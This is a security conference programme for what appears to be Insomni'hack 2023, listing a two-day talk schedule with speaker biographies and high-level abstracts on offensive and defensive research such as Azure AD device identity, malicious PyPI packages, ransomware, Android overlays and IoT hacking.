Talks 2023

Thursday, March 23th

Time TRACK 1 TRACK 2 TRACK 3
09:00 Crazy incentives and how they drive security into no man's land
by Dr. Christian Folini
10:00 COFFEE
10:30 Breaking and fixing Azure AD device identity security
by Dirk-jan Mollema
Targeted Social Engineering Attacks: Weaponizing Psychology
by Christina Lekati
Turn and Face the Strange: Ch-Ch-Changes in Ransomware Techniques
by Lindsay Kaye & James Niven
11:30 A ticket worth waiting 65 years for
by Charlie Bromberg
Hacking Harms! Measuring the impact and harm from cyberattacks
by Emma Raffray
Modern Adventures with Legacy Protocols
by Yannay Livneh
12:30 LUNCH
13:30 Inglourious Drivers - The Revenge of the Peripheral Devices
by Omer Tsarfati
Open Sésame! Example of Modern Electronic Lockpicking
by Thomas Bygodt
Pentesting by the numbers - what data analysis tells about what we do
by Charl van der Walt
14:30 USBvalve - expose USB activity on the fly
by Cesare Pizzi
Hacking your Jump Rope or your Coffee Machine
by Axelle Apvrille
TBA
15:30 COFFEE
16:00 How to have visibility and security OF CICD ecosystem
by Pramod Rana
Cloud, IoT, machine learning: which models for secure ICS network architectures to adapt to new usages?
by Alexandrine Torrents
TBA
17:00 Permissionless Android Universal Overlays
by Dimitrios Valsamaras
Attacking and Defending GraphQL: The Ultimate Guide
by Leo Juszkiewicz
TBA

Friday, March 24th

Time TRACK 1 TRACK 2 TRACK 3
9:00 KEYNOTE
by TBA
10:00 COFFEE
10:30 Breaking Docker's Named Pipes SYSTEMatically
by Eviatar Gerzi
The Snake is in the Grass: Malicious PyPI Packages in the Wild
by Christophe Tafani-Dereeper & Vladimir de Turckheim
Secrets, data and cypher-injections: Neo4j attacks and cloud exploits
by Nitay Bachrach & Or Emanuel (Varonis)
11:30 You click, you lose: a practical look at Visual Studio Code's security
by Thomas Chauchefoin & Paul Gerste
Data Science and Machine Learning in Cybersecurity: Hype or Reality?
by Angelo Schranko de Oliveira
Optimising Business Value with Secure Access Service Edge
by Neil Thacker (Netskope)
12:30 LUNCH
13:30 Whatever Pown2own
by Benoit Forgette & Eloïse Brocas
Detection Engineering in Modern Day Security Organization
by Tondang Managatas
TBA
by Marco Preuss (Kaspersky)
14:30 Cloud Disaster... As a Service
by Chris Hernandez
Adversary Tracking And All The Lies We Tell Ourselves
by Joe Slowik
TBA
15:30 COFFEE
16:00 RCEing Your Way Into the Blockchain: Uncovering a critical vulnerability and taking over Decentralized Identity (DID) networks
by Shaked Reiner
The History of Ransomware: From Floppies to Droppers, and Beyond
by Eliad Kimhy
TBA
17:00 Go security pitfalls: 2 lessons from the battlefield at Grafana Labs
by Jeremy Matos
Why kidz couldn’t care less about your password advice?
by Mia Landsem
TBA
18:15 Auditorium A
 
18:15 - 04:00
(Doors open at 17:15)
Capture The Flag


Crazy incentives and how they drive security into no man's land

Dr. Christian Folini
SPEAKER BIO

Christian Folini is a security engineer, an open source enthusiast and serial keynote speaker. He holds a PhD in medieval history and took that interest to new heights with the actual defense of castles across Europe.
But life goes on and castles tend to be very cold, namely in Winter times.
So he turned to defending web servers, which he finds equally challenging. He brings 15 years of experience with ModSecurity configuration in high security environments, DDoS defense and threat modeling.

Christian Folini is the author of the second edition of the ModSecurity Handbook and the best known teacher on the subject. He co-leads the OWASP ModSecurity Core Rule Set project and serves as the program chair of the “Swiss Cyber Storm” conference. During the years, he made a name of himself as somebody wo managed to piss off the No-E-Voting as well as the Pro-E-Voting crowd, which he takes as proof of a well-balanced and typically Swiss position.

In 2023 he attempts his third InsomniHack keynote in a row with a presentation that is set to vex his supporters and put future sponsoring of his own open source project as well as the conference at risk.

Modern Adventures with Legacy Protocols

Yannay Livneh
SPEAKER BIO

Yannay is a low-level security researcher with varied interests in commodity SW, networking, embedded devices and web browsers. In the last years Yannay discovered, reported and exploited vulnerabilities in popular software such as PHP engine, VLC and Chromium Browser.
Yannay is a regular contributor to PoC||GTFO magazine and also an active CTF player and a member of 5BC team.
ABSTRACT
During 2015-2018 I found myself in a few scenarios that required IP spoofing capabilities to triumph. 30 years ago that wasn't a problem, but nowadays the moderators of the Internet (ISPs, Governments, etc.) don't put up with that (except for themselves). Unfortunately, I'm neither a government nor an ISP so I had to come up with some feasible solution for the average hacker. If you are like me, tragically devoid of nation-state capabilities, join me to this talk where I explain how you can find IP-Spoofing-As-A-Service on the internet today for free using legacy VPN protocols.

But, there is more. This talk is not your average "How I found and exploited CVE-*". No. This is not about the CVEs, not about the 0days, not about the exploits and not about the tools. Even though this talk includes all of the above, the focus of this talk is not the outcome, but the quest we call "research". I will discuss the things you won't find in a paper - the failures, the struggles, the details to make things actually work and the accidental packet of death I unleashed in the wild (I'm sorry). I will also share the horrible experience of reporting a multi-vendor vulnerability and why I will never do this again.

This presentation concludes a 3-years of moonlight research. Parts of it were published before and granted me a Pwnie Award for the Most Under-hyped Research of 2022 and a couple of CVEs. But some parts were left in the shadows. Join me as I conclude the odyssey and share the full juicy details, so you too can spoof the internet at will.

Hacking Harms! Measuring the impact and harm from cyberattacks

Emma Raffray
SPEAKER BIO

As the Chief Research & Analysis Officer, Emma leads the CyberPeace Institute’s analytical activities including the delivery of data-driven platforms, strategic analysis reports and cyber investigations.

She has spent over 10 years working as an intelligence analyst across multiple sectors including national and international law enforcement (Metropolitan Police Service, London, UK and INTERPOL), financial sector, defense and the humanitarian sector. A recognized expert, providing operational and strategic analysis for intelligence units, investigations and projects.

Emma holds a BSc in Criminology and Social Policy, Loughborough University.

ABSTRACT
Over the years efforts to measure the impact of cyberattacks have focused on the direct impact to targeted systems or organizations; from time to restore them, financial costs and to some extent the number of breached records. This narrow assessment of the impact of cyberattacks misses a fundamental element; the harm the attack caused to people. The CyberPeace Institute is developing a methodology to do just this and needs your support!

Data Science and Machine Learning in Cybersecurity: Hype or Reality?

Angelo Schranko de Oliveira
SPEAKER BIO

Dr. Angelo is a Cyber Security Data Scientist Tech Lead at Mercado Libre and former Security Researcher / Software Engineer leveraging cyber security data, Statistics, and Machine Learning to hunt bad guys. The results of his work have been helping security teams to monitor, detect, identify, and prevent cyber threats. In order to achieve those results, he has been developing pipelines to extract/transform data from SIEM, APIs, and Sandboxes and applying/developing Statistical, Supervised, Unsupervised, Natural Language Processing, and Deep Learning models. He holds a PhD in Informatics, where he researched applications of Data Science and Deep Learning to malware detection. As a result, he developed Chimera, a new Android malware detection method based on Multimodal Deep Learning and Hybrid Analysis. He also holds OSCP, OSCE, and Splunk certifications.
ABSTRACT
Defensive mechanisms such as firewalls, proxies, web application firewalls, intrusion detection systems, intrusion prevention systems and so on continuously generate a huge amount of information. How can we leverage that information for threat detection and improvement of SOC operations? In this talk I'll present three real world scenarios where I've successfully applied Data Science, Supervised and Unsupervised Machine Learning, and Probabilistic Graphical Models for triaging SOC alerts, detecting APIs abuses, and detecting data exfiltration. By the end of this talk, the audience will be able to decide if Data Science and Machine Learning in Cybersecurity is reality, hype, both, or neither!

RCEing Your Way Into the Blockchain: Uncovering a critical vulnerability and taking over Decentralized Identity (DID) networks

Shaked Reiner
SPEAKER BIO

Shaked Reiner (@shakreiner) is a principal security researcher at CyberArk Labs focused on vulnerability research, OS security, and decentralized technologies. In his free time, Shaked likes to reverse engineer random pieces of software, solve CTF challenges and make cocktails.
ABSTRACT
The promise of Decentralized Identity (or DID) is to set us free from corporations owning our digital identity (be it Google, Apple, etc.) by distributing it to a blockchain. In this talk, we'll learn the fascinating technology behind DID and see how we were able to completely own one of the most popular DID networks currently active by uncovering a critical CVSS 10 vulnerability in it.

Inglourious Drivers - The Revenge of the Peripheral Devices

Omer Tsarfati
SPEAKER BIO

Omer Tsarfati is a Cyber Security Researcher at CyberArk Labs. He focuses on discovering new research techniques and beating complex security challenges while implementing them into the cyber security area, from the attacker's and the defender's point of view. Tsarfati's primary research areas are network defense, cloud security, android applications, web applications, and he is a Windows internals enthusiast. Prior to CyberArk, Tsarfati served in the Israeli Army in an elite unit.
ABSTRACT
Do you like gaming and gambling?? Why not do both with your computer’s security?!
Just install a driver from your favorite peripheral vendor, and find out if it allows attackers to completely own your machine (chances are it will!).
We'll deep-dive into the 0day we discovered, exploit them, go over mitigations, and explore a very concerning and common drivers' behavior that you can easily avoid.

Breaking and fixing Azure AD device identity security

Dirk-jan Mollema
SPEAKER BIO

Dirk-jan Mollema is a hacker and researcher of Active Directory and Azure AD security. In 2022 he started his own company, Outsider Security, where he performs penetration tests and reviews of enterprise networks and cloud environments. He blogs at dirkjanm.io, where he publishes his research, and shares updates on the many open source security tools he has written over the years. He presented previously at TROOPERS, DEF CON, Black Hat and BlueHat and has been awarded as one of Microsoft’s Most Valuable Researchers multiple times.
ABSTRACT
In zero trust deployments, the users endpoint is an important component. Long-term credentials are stored on the endpoint which comply with strict security policies, such as Multi Factor Authentication and device compliance.

To secure these credentials, hardware protection with a Trusted Platform Module is used where possible. But how effective are these security controls? I have been researching Azure AD device security for the past two years and have broken quite some security controls I encountered.

When a device is joined to Azure AD, several cryptographic secrets are stored in a secure part of the device’s hardware (Trusted Platform Module). These cryptographic secrets are used to prove authentication is happening from that device and the credentials were not simply extracted to elsewhere. When I first started looking at this implementation, there were several issues with it. The secrets to device authentication, although protected by a TPM, could be extracted using mimikatz by dumping the lsass process. During the following months, I researched other attack avenues that could accomplish the same without needing to dump the lsass process. In fact, I discovered it was possible to bypass the protection by the TPM in its entirety and obtain long-lived trusted access tokens without even needing Administrator privileges on the device. Meanwhile, Microsoft improved the authentication flow and changed how the TPM is used during authentication.

In this talk I walk you through all the details of the discovery of these vulnerabilities, and how they were eventually patched by Microsoft throughout 2021 and 2022.

Targeted Social Engineering Attacks: Weaponizing Psychology

Christina Lekati
SPEAKER BIO

Christina Lekati is a psychologist and a social engineer.

With her background and degree in psychology, she learned the mechanisms of behavior, motivation, and decision-making, as well as manipulation and deceit. She became particularly interested in human dynamics and passionate about social engineering.

She works with Cyber Risk GmbH as a social engineering trainer and consultant.
Christina is the leading developer of the social engineering training programs provided by Cyber Risk GmbH. She has participated in penetration tests and is running tailored training programs within companies and organizations,

Christina is also conducting vulnerability assessments on corporations and high-value targets. Those reports are based on Open Source Intelligence (OSINT). Their goal is to help organizations identify and manage risks related to human or physical vulnerabilities. These risks are the result of intelligence that is produced through publicly available resources and that threat actors regularly utilize in their attacks.

Within this realm, she is also an active executive Board Member at the OSINT Curious project, contributing to the international scene of Open Source Intelligence (OSINT) with the latest news, updates, and techniques on collection and analysis.

ABSTRACT
Cybersecurity today is not only a technical challenge.
It is also a behavioral challenge.

For years we have been reading reports warning us that people are the primary attack vector. Social engineering attacks remain at the top of the threat landscape and data breach reports. But although we tend to simplify many breaches as the result of a successful phishing attack, the reality we get from current threat research is more complex. Social engineering attacks have been evolving. Today, the pathway that leads to that successful phishing email is often the result of a larger, well-researched attack kill chain. But it doesn't stop there.

Targeted social engineering attacks that weaponize psychology have started becoming a tool employed by cybercriminals to infiltrate organizations in the public and private sectors, steal sensitive information, recruit insiders, and help threat actors breach an organization's security.

This talk provides insights into the mechanisms and the methodology of today's targeted social engineering attacks and weaponizing psychology. It discusses how attackers tailor their approach in order to compromise specific people in key positions. The tricks they use to build trust and elicit information that assists them in strategizing, initiating, or delivering an attack.

This presentation will include recent, real-life case studies from current threat intelligence; it will discuss the lessons learned and the defense mechanisms we can employ to detect and deter targeted social engineering attacks.

Adversary Tracking And All The Lies We Tell Ourselves

Joe Slowik
SPEAKER BIO

Joe Slowik has over 15 years experience across multiple areas of information security and cyber operations. Currently leading Threat Intelligence and Detection Engineering at Gigamon ThreatINSIGHT, Joe has previously conducted wide-ranging threat intelligence analysis at DomainTools and ICS-focused analysis at Dragos. Additionally, Joe led the Incident Response team at Los Alamos National Laboratory, and served in multiple roles in the US Navy. Joe is dedicated to analyzing and understanding cyber intrusions and their implications, and maintains an independent training and consulting practice with Paralus LLC.
ABSTRACT
Adversary tracking and identification - if not outright attribution - is a complex and challenging task, but one that retains a fundamental flaw in its focus and execution. When tracking entities, from red teams to advanced persistent threats, defenders are almost always operating from the perspective of incident-related technical observations. While this can outline how an incident took place and through what tools, such information does not provide much (if any) insight as to who is involved and what their motivations may necessarily be. In this presentation, we will examine the identification issue, distinguishing between developers, infrastructure operators, and actual intrusion entities while highlighting the implications of these divisions for defenders as well as those involved in the new discipline of adversary emulation. Through this discussion and examination of case studies, attendees will learn the pitfalls of identification on technical artifacts in an increasingly commodity ecosystem, and how to combat the impacts of such a trend in their own operations.

How to have visibility and security OF CICD ecosystem

Pramod Rana
SPEAKER BIO

Pramod Rana is author of below open source projects:
- Omniscient - LetsMapYourNetwork: a graph-based asset management framework
- vPrioritizer - Art of Risk Prioritization: a risk prioritization framework
- sec-depend-aider - Dependabot pull request monitoring automation platform

He has presented at BlackHat, Defcon, nullcon and GrayHat before.

He is leading the application security team in Netskope with primary focus on integrating security controls in the development process and providing security-testing-as-a-service to other teams. He loves to understand new security practices and how to practically implement them.

A security professional by job, a coder by hobby, a runner by passion.

ABSTRACT
Today CICD platforms are an integral and critical part of the overall software supply chain. To support the business requirements, it processes a lot of sensitive data, compromise of which can have effect on the entire organization. Security IN CICD is a well discussed topic, now security OF CICD deserves the same attention.

One of the challenges with security OF CICD, like most areas of security, is the lack of visibility of what actually makes a CICD ecosystem. Security starts with being aware of what needs to be secure.

In this talk I will be presenting how an organization can approach the visibility and thus security OF CICD ecosystem along with some common attack areas like access controls, credentials hygiene, misconfiguration etc. and their possible solutions.

I will introduce two new open source projects:

First, **CICDGuard** - a graph based CICD ecosystem visualizer and security analyzer, which
- Represents entire CICD ecosystem in graph form, providing intuitive visibility and solving the awareness problem
- Identifies common security flaws across supported technologies and provides industry best practices and guidelines for identified flaws
- Technologies supported as of now:
- GitHub
- GitHub Action
- Jenkins
- Spinnaker

Second, **ActionGOAT** - a deliberate damn vulnerable GitHub Action for learning purposes

Cloud, IoT, machine learning: which models for secure ICS network architectures to adapt to new usages?

Alexandrine Torrents
SPEAKER BIO

Alexandrine Torrents is a cybersecurity expert at Wavestone. She started as a penetration tester, and performed several cybersecurity assessments on ICS. She worked on a few ICS models to demonstrate attacks on PLCs and developed a particular tool to request Siemens PLCs. Then, she started working at securing ICS, especially in the scope of the French military law, helping companies offering a vital service to the nation to comply with security rules. Now, Alexandrine works with different industrial CISOs on their cybersecurity projects: defining secure architectures, hardening systems, implementing detection mechanisms. She is also IEC 62443 certified and still performs assessments on multiple environments.
ABSTRACT
There are more and more business needs requiring interconnections with the ICS that seem legitimate. Yet, how do we allow these interconnections in a secure way? And can we say yes to everything?
ICS cybersecurity requirements have always been the same. And in terms of network architecture, we always come to the Purdue Model, as well as the zones and conduits methodology. Traditionally there has been a rigidity to what a “secure” ICS architecture is. The Internet tends to be seen as the devil when we talk about ICS.
Well, “No Limits!” made me want to dream a little bit. What if I could start from scratch and build my dream architecture for ICS without any limit?
In this presentation, we compare and contrast the requirements and corresponding secure ICS network architecture of two very different businesses within the same company: power plants and solar/wind farms.

Attacking and Defending GraphQL: The Ultimate Guide

Leo Juszkiewicz
SPEAKER BIO

Leo is a security researcher with over 7 years of experience in Cyber Security, mostly focused in Web Application Security. Currently works as a Security Researcher at Palo Alto Networks, looking for web vulnerabilities in all sorts of projects at the cloud native landscape, focusing mostly on modern attacks and tactics
ABSTRACT
Attacking and Defending GraphQL, the ultimate GraphQL guide. Leo will elaborate on the basics, history, how they work, advantages, why it became one of the most popular technology for APIs in modern web applications. Subsequently, Leo will elaborate on common attack scenarios. He will dive deeper into the technicalities and share details about several common exploitation techniques and tactics, as well as showcasing real life use case that were exploited in-the-wild, bypassing security entirely, achieving full account takeover. Additionally, Leo will provide statistics and best practices for developers to create a working plan for testing, remediating and validating the security of GraphQL endpoints.

Go security pitfalls: 2 lessons from the battlefield at Grafana Labs

Jeremy Matos
SPEAKER BIO

Jeremy Matos is a Principal Security Engineer at Grafana Labs. Rather than breaking things, the former backend developer has shifted his main focus to helping produce secure enough software. He used to work at GitLab and has 15 years of experience in the software security industry. He has given talks at various security conferences, including DEF CON Crypto Village and OWASP AppSec EU.

Twitter: @SecuringApps

ABSTRACT
Go language has proven to be very secure yet it is not bullet proof. We will analyse in details 2 significant vulnerabilities in Grafana that were ultimately caused by confusion around Go usage. And discuss how we gained confidence that fixes were not missing anything.

Hacking your Jump Rope or your Coffee Machine

Axelle Apvrille
SPEAKER BIO

Axelle Apvrille is a Principal Security Researcher at Fortinet, Fortiguard Labs. Her research interests are mobile and IoT malware. In addition, she is the lead organizer of Ph0wn CTF, a competition which focuses on ethical hacking of smart objects.
In a prior life, Axelle used to implement cryptographic algorithms and security protocols.
ABSTRACT
As some may know, I love to hack IoT. Some connected objects are useful, some are close to useless but whatever category they fall in, they are always very interesting and funny to hack! In this talk, you'll learn how to hack a connected jump rope and a connected coffee machine. Actually, maybe it's better to hack coffee first and get more energy to jump ;P

The talk is very much around Bluetooth Low Energy, Android applications and how to reverse engineer.

Turn and Face the Strange: Ch-Ch-Changes in Ransomware Techniques

Lindsay Kaye&James Niven
SPEAKER BIO

Lindsay Kaye is Senior Director of Advanced Reversing, Malware, Operations and Reconnaissance (ARMOR) at Recorded Future. Her primary focus is the creation of actionable intelligence - providing endpoint, and network detections that can be used to detect threats. Lindsay’s passion is malware analysis and reverse engineering. She received a BS in Engineering with a Concentration in Computing from Olin College of Engineering and an MBA from Babson College.
James Niven is a Principal Threat Researcher at Recorded Future. Previously, James was a Red Teamer and now uses his knowledge to develop defensive approaches to detecting malicious behavior employed by threat actors.
ABSTRACT
Everyone makes mistakes - including threat actors who deploy ransomware. Sometimes, “technical innovation” on the locker goes sideways and makes it easier to track or reverse engineer, or a false flag operation doesn’t quite pin enough blame on the intended party. We will highlight some interesting examples of ransomware techniques, such as PLAY’s usage of ROP, LockBit’s acquisition of BlackMatter code, ALPHV’s Morph obfuscation tool, and the myriad of threat actors who use custom-designed crypto or hard-coded, cryptographically insecure keys, and the opportunities they presented for us as defenders to signature and detect their malicious behavior. We will present technical deep dives on these techniques and talk about evolutions in the lockers, where relevant. On a similar note, we as defenders can often focus on the novel, innovative tools and often the art of the possible while tried and true techniques remain extremely successful for threat actors. As a result, while detections centered on these novel behaviors are effective for threat hunting or tracking specific groups, defending against them is most effectively accomplished by focusing on commodity tools and TTPs used across groups. Finally, we will discuss how to stay ahead of the ever changing threat landscape, and how we anticipate threat actors will evolve, including where we expect to see them innovate next.

Open Sésame! Example of Modern Electronic Lockpicking

Thomas BYGODT
SPEAKER BIO

Thomas BYGODT is a penetration tester at Orange Cyberdefense, a CTF player and a developer.
He does not want to remain passive in front of the technologies that interact with the real world. Testing and understanding them allows us to better understand their limits, both for people's privacy and for their security. He has been specializing in connected devices for 2 years now.
ABSTRACT
In an ever increasingly connected society, we are often introduced to “new and improved” devices that offer smart capabilities, and door locks are no exception. Increased security and ease of use are some of the key selling points for these locks. However, are these modern, connected locks more secure than those from the 90s when a thief could break into your house with a little practice?

This presentation goes back to some of the origins of hacking when hardware was as important as software is today. We will show the consequences of lax security design by hacking a connected door lock. The goal being, of course, that a homeowner would not be aware of our intrusion all without needing any expensive equipment. From the raw electrical signal to a extern proprietary BLE SDK, we will cover all aspects of the lock and confirm some vulnerabilities on another lock.

In fact, sometimes attacking your target is as simple as copying it, giving the firmware some minor tweaks, replacing some parts and voila, Open Sesame!

Cloud Disaster... As a Service

chris hernandez
SPEAKER BIO

Chris Hernandez (@piffd0s) is the founder of Adversary Academy LLC, a boutique cybersecurity training and pentesting firm. The former red team manager at Code42, and a former member of the Veris group adaptive threat division (Now Specterops). From an early age Chris has been interested in the low level workings of computers. When not hacking, Chris would rather be outside living as close to nature as possible.
ABSTRACT
The mix of hybrid on prem and in-cloud environments is prevalent today. With the added operational cost of being fully migrated to the cloud some enterprises have adopted an approach of utilizing cloud service providers for disaster recovery. Physical and virtual machines are synchronized to the cloud as a disaster recovery solution. But what if this Disaster recovery solution is a disaster in its own right? Enter Microsoft Azure Site Recovery, a cloud disaster recovery as a service platform (DRaaS), or as I like to call it, just plain "Disaster-as-a-Service".

Whatever Pown2own

Benoit Forgette&Eloïse Brocas
SPEAKER BIO

Passionate about how systems work since my childhood and with an initial education in computer science, I gradually moved to the security of these systems and the electronic part of these equipments.Today, I work as a Cybersecurity Engineer in software and hardware reverse engineering at Digital Sécurity, where my daily work consists in disassembling equipments sent by our clients, then inspecting all their attack surfaces (hardware, radio, software, cloud). Then, we help our clients to find the best way to protect their systems and their equipments.

In this work, the part that seems to me the most interesting is the automation/instrumentation/hijacking part. It is fascinating to see how much it is possible to hijack a piece of equipment from its original purpose. This is even more impressive when we talk about physical equipment which has an impact on its environment.

ABSTRACT
Pown2own is a bug bounty competition, many participants are present and only the first participant gets a reward.
It is important to be efficient in your research, a search time that does not lead to exploitation will only be a waste of time.
In this competition it is not necessary to be exhaustive but efficient, a vulnerability that cannot lead to a code execution should not be considered.
To avoid falling into these traps we decided to target vulnerabilities with a high chance of leading to code execution and we wanted to industrialize this research by automatizing it and allowing it to reproduce this search on any firmware.

Permissionless Android Universal Overlays

Dimitrios Valsamaras
SPEAKER BIO

Has participated in many International and local Projects increasing his experience in Mobile, Web and network penetration testing. Holds a degree in Computer Science, with a major in Cryptography and Security. His prior experience in the IT industry spans from development and systems administration to IT Security services. He has a strong passion for reverse engineering and was a member of one of the first reverse engineering research groups in Greece. During the last five years, Dimitrios has been working with some of the largest companies in the industry, including Microsoft and Google, focusing on the Android Ecosystem Security.
ABSTRACT
Both Android and iOS operating systems interact with the users using a constrained graphical interface, typically occupied at its majority by one application at a time while many of them can run in the background. That being said, a user must rely on the GUI provided by the application itself to verify its legitimacy. This type of behavior has raised concerns within the security research community that have been proved to be well founded, judging from the fact that multiple malware campaigns use GUI confusion as their main attack vector.

In this paper we present a novel GUI attack that leverages the fact that an Android activity maintains its graphical state and can receive touches, while it’s in the top of the back stack of the device home screen. Whilst most of the techniques that have been introduced so far require the SYSTEM_ALERT_WINDOW permission, the one we present is permissionless and makes use only of the FLAG_NOT_TOUCH_MODAL flag.

By using this technique, we were able to create overlapping views over system dialogues, luring the user to unintentionally approve dangerous permissions and access to system services. Third party applications are also at risk, as it is possible to garble their UI by projecting fraudulent views that ostensibly belong to the targeted application’s context. For the latter to be successful, the PACKAGE_USAGE_STATS permission must be obtained in order to identify the application that is currently in the foreground.

Google addressed a similar issue (CVE-2020-0416) for Android versions 8.0, 8.1, 9, 10 and 11 by enabling the filterTouchesWhenObscured attribute on all SwitchPreferences, for pages that control special application permission access. Our technique (CVE-2021-39617) was not affected by this fix, and it was proven to additionally impact system dialogues that control dangerous permissions.

The Snake is in the Grass: Malicious PyPI Packages in the Wild

Christophe Tafani-Dereeper&VLADIMIR DE TURCKHEIM
SPEAKER BIO

Christophe lives in Switzerland and works on cloud security research and open source at Datadog. He previously worked as a software developer, penetration tester and cloud security engineer. Christophe previously spoke at industry conferences like Cloud Native SecurityCon, DEFCON Cloud Village or BlackHat Arsenal, and is the maintainer of several popular open-source projects such as Stratus Red Team, GuardDog, CloudFlair and Adaz.

Vladimir (Vlad) is a Staff engineer at Datadog. He has been working on Application Security topics since 2016 at Sqreen then at Datadog. He also is a Node.js core collaborator and has focused on Node.js runtime instrumentation. When he is not hacking, you might find him cooking or planning an upcoming raclette party.
Vladimir (Vlad) is a Staff engineer at Datadog. He has been working on Application Security topics since 2016 at Sqreen then at Datadog. He also is a Node.js core collaborator and has focused on Node.js runtime instrumentation. When he is not hacking, you might find him cooking or planning an upcoming raclette party.

ABSTRACT
Over the past few years, attackers have increasingly been using malicious software packages to compromise developer machines and organizations. The Python Package Index (PyPI), in particular, is frequently used to host backdoored versions of legitimate packages and information stealers. In this talk, we describe our approach and findings to identify malicious PyPI packages and present a new open-source tool, GuardDog.

Detection Engineering in Modern Day Security Organization

@tas_kmanager
SPEAKER BIO

Tas is currently working as Security Researcher for Microsoft, where his main responsibility is to improve their Detection Engineering capabilities by researching novel attacks and create detection mechanisms. Before that he worked in multiple companies such as Big 4 Consulting and Telecommunication, performing and building Threat Hunting and Detection Engineering functions.

He is a seasoned Incident Responder and Threat Hunter with Detection Engineering mindset; he believes after every incident there is always a new detection opportunity. He loves to be involved in the security community and has presented at numerous world class conferences such as SANS Summits and DEF CON BTV. He is also an active contributor to the DFIR Report, where he took part in real attacks analysis and provide the public with high quality threat intelligence report and article. He is also a proud member of CDEF.ID, and Indonesian Security community where he has presented, talked in podcast and is volunteering as a mentor.

Outside of security, he enjoys traveling with friends and family, doing astrophotography and cooking new foods from different part of the world.

ABSTRACT
Is Detection Engineering just another overly hyped term in the world of Cyber Security? Does the role is just a made-up role combining different elements of Defensive Security? Should your company stay away and not implementing this fancy role in your organization?

If you are having these questions, then this presentation is for you! In this talk, we will dive into Detection Engineering, discussing all the components and parts of this role. We will view the role from different point of views, started from the organization view, the individual view (aka Detection Engineer view) and the daily view. On top of that, this presentation will be filled with real life detection engineering lesson, gathered from the presenter career and other detection engineers in the industry.

After this presentation you or your organization will be able to decide if your organization need a detection engineering role and with the information provided able to build a successful detection engineering program and train or hire the right detection engineer.

The History of Ransomware: From Floppies to Droppers, and Beyond

Eliad Kimhy
SPEAKER BIO

Eliad is the head of Akamai Security Research CORE Team guiding the development of the Akamai Security Research work. He was one of the creators and producers of the podcast Malicious Life which tells stories from the history of cybersecurity, and has a deep passion for the untold stories of hackers. Eliad has worked with security teams for over half a decade, helping build security research organizations and publishing blogs and reports for security researchers. He has spoken at conferences such as Code.talks, IT-SA, and TBX Netherlands.
ABSTRACT
Modern ransomware has become synonymous with some of the most devastating cyber attacks of our time.. But it hasn't always been so. 30 years ago, ransomware was born as a wild scheme, devised by a man armed with 10,000 floppy disks and a virus. How has this evolved into the most impactful form of cybercrime today, and what can this surprising, untold history teach us about our present and future?

USBvalve - expose USB activity on the fly

Cesare Pizzi
SPEAKER BIO

Cesare Pizzi is a Security Researcher, Analyst, and Technology Enthusiast at Sorint.lab.
He develops software and hardware, and tries to share this with the community. Mainly focused on low level programming, he developed a lot of OpenSource software, sometimes hardware related (to interface some real world devices) sometimes not.
Doing a lot of reverse engineering too. He gave some presentations in different conferences:

- DEFCON 25 HHV: Ardusploit: PoC of Arduino code injection
- DEFCON 27 PHV: Sandbox creative usage
- BHUSA 2020 Arsenal - SYNwall: A Zero-Configuration (IoT) Firewall
- Insomni'hack 2022 - REW-sploit: dissect payloads with ease
- DEFCON 30 - Old Malware, New tools: Ghidra and Commodore 64

Contributor of several OS Security project (Volatility, OpenCanary, Speakeasy, CETUS, etc) and CTF player.

ABSTRACT
I'm sure that, like me, you were asked to put your USB drive in an "unknown" device...and then the doubt: what happened to my poor dongle, behind the scene? Stealing my files? Encrypting them? Or "just" installing a malware? With **USBvalve** you can spot this out in seconds: built on super cheap off-the-shelf hardware you can quickly test any USB file system activity and understand what is going on before it's too late!

Breaking Docker’s Named Pipes SYSTEMatically

Eviatar Gerzi
SPEAKER BIO

Eviatar Gerzi is a Sr. Security Researcher at CyberArk Labs where he focuses on researching and discovering the latest attack techniques and applying lessons learned to improve cyber defenses. Gerzi's primary research areas are network defense and DevOps. Prior to CyberArk, Gerzi worked as a security researcher with a specialty in Windows operating system and malware analysis. Gerzi is a skilled classical pianist. He also likes to solve CTFs and play chess and ping pong.
ABSTRACT
While Docker is mainly known for running containers in a Linux environment, Docker Desktop is an application, by Docker, for Windows machines to run containers in Windows.

In this talk, we’ll show how Windows container research took a different turn, and we found multiple insecure APIs through a named pipe that led to numerous privilege escalation vulnerabilities.

You click, you lose: a practical look at Visual Studio Code's security

Thomas Chauchefoin&Paul Gerste
SPEAKER BIO

Thomas Chauchefoin (@swapgs) is a Vulnerability Researcher in the Sonar R&D team. With a strong background in offensive security, he helps uncover and responsibly disclose 0-days in major open-source software. He also participated in competitions like Pwn2Own or Hack-a-Sat and was nominated for two Pwnie Awards for his research on PHP supply chain security.
Paul Gerste (@pspaul95) is a Vulnerability Research in the Sonar R&D team. In the last months, he has been hunting bugs in popular JavaScript and TypeScript applications, yielding critical vulnerabilities in projects such as Rocket.Chat, NodeBB, and Blitz.js. Paul has also been a CTF player and organizer for some years and loves to hack all web-related things.
ABSTRACT
Developers are becoming targets of choice for threat actors because of their access to business-critical code and services. By compromising a single developer, software backdoors and supply chain attacks can lead to the compromise of high-profile organizations. For instance, a recent campaign attributed to North Korea has set up social network profiles and websites to social engineer and infect prominent figures of the developer community with malicious Visual Studio projects and browser exploits.
At the same time, modern development tools like IDEs offer increasingly advanced features and deep integration with language ecosystems, sometimes at the cost of basic security measures. IDEs tried to counterbalance it by introducing new lines of defense (e.g., "Workspace Trust"), whose design inevitably led to a cat-and-mouse game to restrict access to sensitive attack surfaces while keeping most features available by default.
In this talk, we present the state of the art of Visual Studio Code's security. We go in-depth into its attack surface, how its extensions work and the technical details of two vulnerabilities we found in Visual Studio Code. These findings, CVE-2021-43891 and CVE-2022-30129, led to a $30.000 bounty with an unexpected twist. We also present 1-days discovered by other researchers, to develop the intuition of the audience. These concepts apply to most IDEs of the market and everybody will now think twice before opening third-party code!

A ticket worth waiting 65 years for

Charlie Bromberg
SPEAKER BIO

Shutdown (Charlie BROMBERG, [@_nwodtuhs](https://twitter.com/_nwodtuhs)) is a penetration testing team leader in the South of France at Capgemini. He specializes in Active Directory. Author of [The Hacker Recipes](https://www.thehacker.recipes/), creator of [Exegol](https://github.com/ShutdownRepo/Exegol), and many other open-source projects and tools ([pyWhisker](https://github.com/ShutdownRepo/pywhisker), [targetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast), [etc.](https://github.com/ShutdownRepo)).
ABSTRACT
Silver and Golden tickets are used for persistence purposes within Active Directory offensive operations. In 2022, the "diamond" and "sapphire" variations of those forged tickets emerged. Let's understand, forge and use those tickets, and get a step ahead of the blue team

Secrets, data and cypher-injections: Neo4j attacks and cloud exploits

